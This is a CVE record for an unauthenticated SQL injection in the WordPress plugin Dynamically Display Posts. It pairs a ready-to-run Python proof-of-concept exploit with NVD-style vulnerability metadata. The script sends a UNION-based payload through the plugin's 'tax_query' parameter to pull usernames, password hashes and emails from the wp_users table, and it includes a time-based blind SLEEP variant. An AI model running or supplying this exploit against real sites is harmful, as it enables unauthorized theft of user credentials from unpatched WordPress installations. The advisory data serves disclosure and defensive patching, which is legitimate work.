CVE-2025-11501

# CVE-2025-11501 PoC - SQL Injection in WordPress Dynamically Display Posts Plugin # Vulnerability: Unauthenticated SQL Injection via 'tax_query' parameter # Affected: All versions up to and including 1.1 import requests target_url = "http://target-wordpress-site.com" # The vulnerable endpoint is typically accessed via the plugin's frontend vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Crafted payload exploiting the tax_query parameter # Using UNION-based SQL injection to extract sensitive data payload = { "action": "ddp_get_posts", "tax_query": "1) UNION SELECT user_login,user_pass,user_email,1 FROM wp_users-- -" } # Send the malicious request response = requests.post(vulnerable_endpoint, data=payload) if response.status_code == 200: print("[+] SQL Injection successful!") print("[+] Response contains database data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") # Alternative payload using time-based blind SQL injection import time time_payload = { "action": "ddp_get_posts", "tax_query": "1) AND (SELECT SLEEP(5))-- -" } start_time = time.time() response = requests.post(vulnerable_endpoint, data=time_payload) elapsed_time = time.time() - start_time if elapsed_time >= 5: print("[+] Time-based SQL Injection confirmed!") print(f"[+] Response time: {elapsed_time:.2f} seconds")

{"cve": {"id": "CVE-2025-11501", "sourceIdentifier": "[email protected]", "published": "2025-10-15T08:15:33.847", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Dynamically Display Posts plugin for WordPress is vulnerable to SQL Injection via the 'tax_query' parameter in all versions up to, and including, 1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/dynamically-display-posts/trunk/includes/frontend/classes/database-talk.php#L38", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ad5698-4299-48a4-bcc1-5f4436dfab27?source=cve", "source": "[email protected]"}]}}